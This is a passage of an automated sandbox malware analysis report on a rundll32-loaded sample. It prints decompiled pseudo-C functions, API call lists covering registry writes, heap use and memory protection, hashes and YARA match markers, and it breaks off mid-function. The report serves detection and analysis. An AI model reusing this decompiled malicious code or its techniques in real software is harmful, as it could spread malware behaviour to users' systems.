                          0x010043fd
                          0x01004402
                          0x0100440d
                          0x0100441d
                          0x0100446c
                          0x01004471
                          0x01004471
                          0x01004474
                          0x01004478
                          0x010044b2
                          0x010044b2
                          0x010044b8
                          0x010044bf
                          0x010044bf
                          0x0100447a
                          0x0100447d
                          0x0100447f
                          0x0100448c
                          0x0100448e
                          0x01004495
                          0x010044cc
                          0x010044d1
                          0x010044d3
                          0x010044d5
                          0x010044d5
                          0x00000000
                          0x010044d3
                          0x01004497
                          0x0100449e
                          0x010044ac
                          0x00000000
                          0x010044ac
                          0x0100441f
                          0x0100443a
                          0x01004454
                          0x00000000
                          0x01004454
                          0x0100444d
                          0x00000000

                          APIs
                          • wsprintfA.USER32 ref: 0100440D
                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01004432
                            • Part of subcall function 0100300E: GetTickCount.KERNEL32 ref: 01003025
                            • Part of subcall function 0100300E: wsprintfA.USER32 ref: 01003072
                            • Part of subcall function 0100300E: wsprintfA.USER32 ref: 0100308F
                            • Part of subcall function 0100300E: wsprintfA.USER32 ref: 010030B1
                            • Part of subcall function 0100300E: wsprintfA.USER32 ref: 010030D8
                            • Part of subcall function 0100300E: wsprintfA.USER32 ref: 01003103
                            • Part of subcall function 0100300E: HeapFree.KERNEL32(00000000,?), ref: 01003116
                            • Part of subcall function 0100300E: wsprintfA.USER32 ref: 01003135
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 010044AC
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: wsprintf$Heap$Free$AllocateCountTick
                          • String ID:
                          • API String ID: 1307794992-0
                          • Opcode ID: 0becb2c10a35dad3cbdacec9381f97704f41c97246eda1fc2d059c6499f42795
                          • Instruction ID: 1adefe607bcd2be93e6431bfacfe41e4f3d2708499ff269e7d33d2f4775799ae
                          • Opcode Fuzzy Hash: 0becb2c10a35dad3cbdacec9381f97704f41c97246eda1fc2d059c6499f42795
                          • Instruction Fuzzy Hash: 3C314C71600219EFDB13DF58D884ADA3BBCFB08344F118062FA85E7291DB79E945CBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B76C1E Relevance: 4.6, APIs: 3, Instructions: 81registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B7B7A4: RegCreateKeyA.ADVAPI32(80000001,05FBB7F0,?), ref: 05B7B7B9
                            • Part of subcall function 05B7B7A4: lstrlen.KERNEL32(05FBB7F0,00000000,00000000,00000000,?,05B7A2EB,00000001,?,00000000,00000000,00000000,?,05B6109E,05B89F2C,00000008,00000003), ref: 05B7B7E2
                          • RegQueryValueExA.KERNEL32(00000000,75BCC740,00000000,00000000,05B89068,05B6E6ED,00000001,00000000,05FBC314,05B8906E,00000000,00000000,05B7CB01,05FBC314,75BCC740,00000000), ref: 05B76C72
                          • RegSetValueExA.KERNEL32(05B89068,00000003,00000000,00000003,05B89068,00000028), ref: 05B76CB3
                          • RegCloseKey.ADVAPI32(?), ref: 05B76CBF
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Value$CloseCreateQuerylstrlen
                          • String ID:
                          • API String ID: 2552977122-0
                          • Opcode ID: 3512281cccc9e716ff3077ca6661034cf7fc881775fbc3bd76ff6a78a02a3aea
                          • Instruction ID: 30e8d9f754e6de5bd8e0276dc4720e359fce648d935e4ed6e5994aedec4d0bc6
                          • Opcode Fuzzy Hash: 3512281cccc9e716ff3077ca6661034cf7fc881775fbc3bd76ff6a78a02a3aea
                          • Instruction Fuzzy Hash: 10312A75D10218EFDF229FA8E8469BEBFBAFB04750F1050AAF915A3240D7307A44DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B66261 Relevance: 4.6, APIs: 3, Instructions: 73registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B8087A: lstrlen.KERNEL32(?,00000000,05B7BA3E,00000027,05B8A1E8,?,00000000,?,?,05B7BA3E,?,00000001,?,05B70971,00000000,?), ref: 05B808B0
                            • Part of subcall function 05B8087A: lstrcpy.KERNEL32(00000000,00000000), ref: 05B808D4
                            • Part of subcall function 05B8087A: lstrcat.KERNEL32(00000000,00000000), ref: 05B808DC
                          • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020119,?,?,?,00000000), ref: 05B662A8
                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00000000), ref: 05B662BE
                          • RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 05B66307
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Open$Closelstrcatlstrcpylstrlen
                          • String ID:
                          • API String ID: 4131162436-0
                          • Opcode ID: 58cb907046010f396ac0e6e25990defbb6a2213737e40f75aa561d8cc9c1daf9
                          • Instruction ID: 48d0cf1996e1b0490346e73e10e72a783a52d2de6d377917bcbfbc4e4b6e152d
                          • Opcode Fuzzy Hash: 58cb907046010f396ac0e6e25990defbb6a2213737e40f75aa561d8cc9c1daf9
                          • Instruction Fuzzy Hash: 19213872A10109BFCB01EFA5DD85CAEBBBDFB05254B1040A6F611A3111E774BA59DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01003B58 Relevance: 4.6, APIs: 3, Instructions: 73memorystringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 79%
                          			E01003B58(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0x100a2d8, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E01007A1E(_t57 - _a4, _a4, _t48);
							_t38 = E01007A1E(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E01007A1E(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}
















                          0x01003b60
                          0x01003b63
                          0x01003b65
                          0x01003b6e
                          0x01003b80
                          0x01003b80
                          0x01003b84
                          0x01003b86
                          0x01003b89
                          0x01003b8c
                          0x01003b95
                          0x01003b9f
                          0x01003ba3
                          0x01003ba8
                          0x01003bb8
                          0x01003bbe
                          0x01003bc2
                          0x01003c11
                          0x01003bc4
                          0x01003bc4
                          0x01003bcd
                          0x01003bdc
                          0x01003be1
                          0x01003bee
                          0x01003bf7
                          0x01003c02
                          0x01003c09
                          0x01003c0d
                          0x01003c0d
                          0x01003bc2
                          0x01003c18
                          0x01003c1f

                          APIs
                          • lstrlen.KERNEL32(76CDF710,?,00000000,?,76CDF710), ref: 01003B8C
                          • StrStrA.SHLWAPI(00000000,?), ref: 01003B99
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 01003BB8
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: AllocateHeaplstrlen
                          • String ID:
                          • API String ID: 556738718-0
                          • Opcode ID: eef2f88f3c613bcc6a3d3b89831eb1cf230c95bb43d6a543b3a1c01286d4e074
                          • Instruction ID: 5427385025f2f511b1f54e02a0612a6c5b58b2abe9a29418814f5904bf8bb771
                          • Opcode Fuzzy Hash: eef2f88f3c613bcc6a3d3b89831eb1cf230c95bb43d6a543b3a1c01286d4e074
                          • Instruction Fuzzy Hash: 56218135600249AFDB12CF6DC884BDEBFB5EF85214F088150ED84AB345C735E955CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01006E6D Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                          Download Yara Rule
                          C-Code - Quality: 47%
                          			E01006E6D(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E01006D63(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x1009284); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                          0x01006e71
                          0x01006e7e
                          0x01006e80
                          0x01006e81
                          0x01006e89
                          0x01006e89
                          0x01006e8d
                          0x00000000
                          0x00000000
                          0x01006e84
                          0x01006e85
                          0x01006e88
                          0x01006e88
                          0x01006e95
                          0x01006e9a
                          0x01006e9f
                          0x01006ea7
                          0x01006ead
                          0x01006eaf
                          0x01006eb2
                          0x01006eb6
                          0x01006eb8
                          0x01006ebb
                          0x01006ebb
                          0x01006ebc
                          0x01006ebe
                          0x01006ebb
                          0x01006ec8
                          0x01006ecb
                          0x01006ece
                          0x01006ecf
                          0x01006ed1
                          0x01006ed8
                          0x01006ed8
                          0x01006ee4

                          APIs
                          • StrChrA.SHLWAPI(?,00000020,00000000,052995AC,?,?,010076A6,?,052995AC), ref: 01006E89
                          • StrTrimA.SHLWAPI(?,01009284,00000002,?,010076A6,?,052995AC), ref: 01006EA7
                          • StrChrA.SHLWAPI(?,00000020,?,010076A6,?,052995AC), ref: 01006EB2
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Trim
                          • String ID:
                          • API String ID: 3043112668-0
                          • Opcode ID: 12cd4a55ff3683ea835b67b11c050e13d222a9a0d42f7f186ba48028f80ee846
                          • Instruction ID: b0a1f37b98a46a8ed62400c6ae104bc37d33a725e82844c61bdd5f0ff74a97f7
                          • Opcode Fuzzy Hash: 12cd4a55ff3683ea835b67b11c050e13d222a9a0d42f7f186ba48028f80ee846
                          • Instruction Fuzzy Hash: 65019E71300396AEF7625A2ACC44F677EDEEB85750F041051AA85CB2C2DA72DC628660
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01007928 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 48COMMON
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E01007928(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t14 = E01003F07(_a4, _t26, __edi); // executed
				_t28 = _t14;
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x100a348; // 0x428d5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x100b4e0; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x100b8f4; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E010023AA();
					_push( &_v64);
					if( *0x100a100() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E010023AA();
				}
				return _t28;
			}















                          0x01007928
                          0x0100792f
                          0x01007938
                          0x0100793d
                          0x01007941
                          0x0100794b
                          0x01007950
                          0x01007955
                          0x0100795a
                          0x01007964
                          0x0100796e
                          0x0100796e
                          0x01007966
                          0x01007966
                          0x01007966
                          0x01007966
                          0x01007974
                          0x0100797a
                          0x0100797b
                          0x0100797e
                          0x01007981
                          0x01007984
                          0x0100798c
                          0x01007995
                          0x0100799d
                          0x0100799d
                          0x0100799f
                          0x010079a1
                          0x010079a1
                          0x010079ab

                          APIs
                            • Part of subcall function 01003F07: SysAllocString.OLEAUT32(00000000), ref: 01003F61
                            • Part of subcall function 01003F07: SysAllocString.OLEAUT32(0070006F), ref: 01003F75
                            • Part of subcall function 01003F07: SysAllocString.OLEAUT32(00000000), ref: 01003F87
                          • memset.NTDLL ref: 0100794B
                          • GetLastError.KERNEL32 ref: 01007997
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: AllocString$ErrorLastmemset
                          • String ID: <
                          • API String ID: 3736384471-4251816714
                          • Opcode ID: dcdf4eb508fee73cca44e4e551b1382d375f19d83527ea827b70f7509ecd434c
                          • Instruction ID: 6dcd6eb236767ec0e2417d7efcc6ca56802ceee6d77d98e0370559ec8dd16760
                          • Opcode Fuzzy Hash: dcdf4eb508fee73cca44e4e551b1382d375f19d83527ea827b70f7509ecd434c
                          • Instruction Fuzzy Hash: 94014071900219AFEB22EFA8D888EDEBBF8BB08744F454165F994E7281D774A504CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7B7A4 Relevance: 4.5, APIs: 3, Instructions: 40registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegCreateKeyA.ADVAPI32(80000001,05FBB7F0,?), ref: 05B7B7B9
                          • RegOpenKeyA.ADVAPI32(80000001,05FBB7F0,?), ref: 05B7B7C3
                          • lstrlen.KERNEL32(05FBB7F0,00000000,00000000,00000000,?,05B7A2EB,00000001,?,00000000,00000000,00000000,?,05B6109E,05B89F2C,00000008,00000003), ref: 05B7B7E2
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateOpenlstrlen
                          • String ID:
                          • API String ID: 2865187142-0
                          • Opcode ID: 8ebc5a8d3ec6ccbe6596bc0dae0f29fc531610911fa35ac5836a65ce89c94fc8
                          • Instruction ID: ce1aa094af54250dc19a01dc551aaf67507b99d232709ed41d144e4b50ffdbe8
                          • Opcode Fuzzy Hash: 8ebc5a8d3ec6ccbe6596bc0dae0f29fc531610911fa35ac5836a65ce89c94fc8
                          • Instruction Fuzzy Hash: 86F0967610020CBFDB119F51DC89FBB7F6DFB45794F148089FD068A180EA70A680CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7E831 Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON
                          Download Yara Rule
                          APIs
                          • SetEvent.KERNEL32(000005BC,05B7C3DB), ref: 05B7E83B
                            • Part of subcall function 05B634FF: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,05B7E846), ref: 05B63528
                            • Part of subcall function 05B634FF: RtlDeleteCriticalSection.NTDLL(05B8A3E0), ref: 05B6355B
                            • Part of subcall function 05B634FF: RtlDeleteCriticalSection.NTDLL(05B8A400), ref: 05B63562
                            • Part of subcall function 05B634FF: ReleaseMutex.KERNEL32(000005C8,00000000,?,?,?,05B7E846), ref: 05B6358B
                            • Part of subcall function 05B634FF: FindCloseChangeNotification.KERNEL32(?,?,05B7E846), ref: 05B63597
                            • Part of subcall function 05B634FF: ResetEvent.KERNEL32(00000000,00000000,?,?,?,05B7E846), ref: 05B635A3
                            • Part of subcall function 05B634FF: CloseHandle.KERNEL32(?,?,05B7E846), ref: 05B635AF
                            • Part of subcall function 05B634FF: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,05B7E846), ref: 05B635B5
                            • Part of subcall function 05B634FF: SleepEx.KERNEL32(00000064,00000001,?,?,05B7E846), ref: 05B635C9
                            • Part of subcall function 05B634FF: HeapFree.KERNEL32(00000000,00000000,?,?,05B7E846), ref: 05B635ED
                            • Part of subcall function 05B634FF: RtlRemoveVectoredExceptionHandler.NTDLL(059805B8), ref: 05B63623
                            • Part of subcall function 05B634FF: SleepEx.KERNEL32(00000064,00000001,?,?,05B7E846), ref: 05B6363F
                          • CloseHandle.KERNEL32(000005BC), ref: 05B7E850
                          • HeapDestroy.KERNELBASE(05BC0000), ref: 05B7E860
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep$Close$CriticalDeleteEventHandleHeapSection$ChangeDestroyExceptionFindFreeHandlerMutexNotificationReleaseRemoveResetVectored
                          • String ID:
                          • API String ID: 3503058985-0
                          • Opcode ID: e916745a67f2398dd70e25ccb94a96bc976694c8c4dcab9798a6e1965e48d737
                          • Instruction ID: 67c21d96a68f2762805d07dca027dd31899dfad17c275c53e115276a5be0597f
                          • Opcode Fuzzy Hash: e916745a67f2398dd70e25ccb94a96bc976694c8c4dcab9798a6e1965e48d737
                          • Instruction Fuzzy Hash: E0E04C707242456BDB306F75E84EA363BEEBF0565175814A9F416D3140DF24F444E650
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01002575 Relevance: 3.8, APIs: 3, Instructions: 82COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E01002575(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E01006D63(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x100a378, 0x110);
					_t27 =  *0x100a37c; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E0100138A(0x110, _a4, _a4, _t27, 0);
					}
					if(E01006BF2( &_v36) != 0) {
						_t35 = E01005FBB(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_t38 = E010013C7(_t55, _a8, _t51, _t46, _a12); // executed
							_v16 = _t38;
							 *(_t55 + 4) = _v36;
							memset(_t55, 0, _v12 - (_t46[4] & 0xf));
							_t57 = _t57 + 0xc;
							E01006C2C(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E01006C2C(_a4);
				}
				return _v16;
			}
















                          0x0100257b
                          0x01002580
                          0x0100258d
                          0x01002590
                          0x01002593
                          0x01002598
                          0x0100259d
                          0x010025ab
                          0x010025b0
                          0x010025b5
                          0x010025ba
                          0x010025bc
                          0x010025c5
                          0x010025c5
                          0x010025d4
                          0x010025e9
                          0x010025f0
                          0x010025f7
                          0x010025fd
                          0x01002603
                          0x0100260b
                          0x01002611
                          0x01002621
                          0x01002626
                          0x0100262a
                          0x0100262a
                          0x010025f0
                          0x01002635
                          0x01002640
                          0x01002640
                          0x0100264c

                          APIs
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • memcpy.NTDLL(00000000,00000110,?,?,?,?,?,?,?,01004493,?), ref: 010025AB
                          • memset.NTDLL ref: 01002621
                          • memset.NTDLL ref: 01002635
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: memset$AllocateHeapmemcpy
                          • String ID:
                          • API String ID: 1529149438-0
                          • Opcode ID: 21aa78b2a177e5d69751478c4621f3f0962e74b80eea33dd0401a6033354bb87
                          • Instruction ID: b2a45a433b8eba7fb32c9b516d7e6087a56b94e22e09ce029c8e7d57b1d37d91
                          • Opcode Fuzzy Hash: 21aa78b2a177e5d69751478c4621f3f0962e74b80eea33dd0401a6033354bb87
                          • Instruction Fuzzy Hash: C6217F71A00619ABEF12AF65CC44FEEBFB8EF18640F048065F944A7280E735D6108BA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00D214D4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 94memoryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.506070289.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_d20000_rundll32.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID: X
                          • API String ID: 544645111-3081909835
                          • Opcode ID: ffbf7c04eac8a838e6cdd7f44e2fdfe440e49081e214ba8c94b3cbc9c61134fd
                          • Instruction ID: 6af61504a2227da84e31622c2ddc6f8f34ad87787d4920d4067c8ec1e98e4cd9
                          • Opcode Fuzzy Hash: ffbf7c04eac8a838e6cdd7f44e2fdfe440e49081e214ba8c94b3cbc9c61134fd
                          • Instruction Fuzzy Hash: F6417DB9E016288FDB54CF49C880B88FBB2BF58314F158199C909AB356D731AE85CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B75D7A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15threadCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B671B4: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,05B8A170,00000000,05B75D81,?,05B6F2F7,?), ref: 05B671D3
                            • Part of subcall function 05B671B4: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,05B8A170,00000000,05B75D81,?,05B6F2F7,?), ref: 05B671DE
                            • Part of subcall function 05B671B4: _wcsupr.NTDLL ref: 05B671EB
                            • Part of subcall function 05B671B4: lstrlenW.KERNEL32(00000000), ref: 05B671F3
                          • ResumeThread.KERNEL32(00000004,?,05B6F2F7,?), ref: 05B75D8F
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                          • String ID: v
                          • API String ID: 3646851950-1801730948
                          • Opcode ID: 473227ad8959569fbdc4cde914e5ff164738cb54abcf24ceea0ed9dfd012334c
                          • Instruction ID: 7352def069fe5fbeafeabb6d7015a0cab970999738734182cf0aaea901adfe3f
                          • Opcode Fuzzy Hash: 473227ad8959569fbdc4cde914e5ff164738cb54abcf24ceea0ed9dfd012334c
                          • Instruction Fuzzy Hash: 6AD05E38248304ABE7312B10CD0FF267D93EF40B54F1084D8F995500F0C776B890DA44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01001F7A Relevance: 3.1, APIs: 2, Instructions: 149serviceCOMMON
                          Download Yara Rule
                          C-Code - Quality: 38%
                          			E01001F7A(intOrPtr _a4) {
				void* _v12;
				char _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				short _t73;
				intOrPtr* _t74;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t82;
				char* _t98;
				intOrPtr _t100;
				void* _t106;
				void* _t108;
				intOrPtr _t112;

				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x100a348; // 0x428d5a8
				_t4 = _t49 + 0x100b448; // 0x52989f0
				_t82 = 0;
				_t5 = _t49 + 0x100b438; // 0x9ba05972
				_t51 =  *0x100a170(_t5, 0, 4, _t4,  &_v20); // executed
				_t106 = _t51;
				if(_t106 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t98 =  &_v48;
					_push(_t98);
					_push(_t98);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x100a348; // 0x428d5a8
						_t30 = _t56 + 0x100b428; // 0x52989d0
						_t31 = _t56 + 0x100b458; // 0x4c96be40
						_t58 =  *0x100a10c(_v12, _t31, _t30,  &_v24); // executed
						_t106 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t106 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t106 >= 0) {
							_t112 = _v16;
							if(_t112 == 0) {
								_t106 = 0x80004005;
								goto L11;
							} else {
								if(_t112 <= 0) {
									L11:
									if(_t106 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = 3;
										_v48 = _t73;
										_t74 = _v20;
										_v40 = _t82;
										_t108 = _t108 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t106 =  *((intOrPtr*)( *_t74 + 0x20))(_t74,  &_v12);
										if(_t106 < 0) {
											goto L7;
										} else {
											_t77 =  *0x100a348; // 0x428d5a8
											_t23 = _t77 + 0x100b428; // 0x52989d0
											_t24 = _t77 + 0x100b458; // 0x4c96be40
											_t106 =  *0x100a10c(_v12, _t24, _t23,  &_v24);
											_t80 = _v12;
											 *((intOrPtr*)( *_t80 + 8))(_t80);
